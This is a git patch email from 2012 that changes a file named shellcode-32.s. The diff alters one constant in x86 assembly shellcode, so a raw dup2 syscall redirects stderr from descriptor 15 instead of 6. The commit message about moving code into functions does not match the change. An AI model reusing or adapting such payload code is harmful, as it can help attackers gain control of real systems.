From e4b69563110bcf08b8f4f442096d5b3df2bb3ed9 Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Tue, 24 Jan 2012 18:54:47 +0100 Subject: Move things into separate functions. --- shellcode-32.s | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) (limited to 'shellcode-32.s') diff --git a/shellcode-32.s b/shellcode-32.s index bb29701..4cde42e 100644 --- a/shellcode-32.s +++ b/shellcode-32.s @@ -13,9 +13,9 @@ int 0x80 xor ebx,ebx mov al,0x2e int 0x80 -;dup2(6, 2) +;dup2(15, 2) xor ecx,ecx -mov bl,0x6 +mov bl,0xf mov cl,0x2 mov al,0x3f int 0x80 -- cgit v1.2.3-59-g8ed1b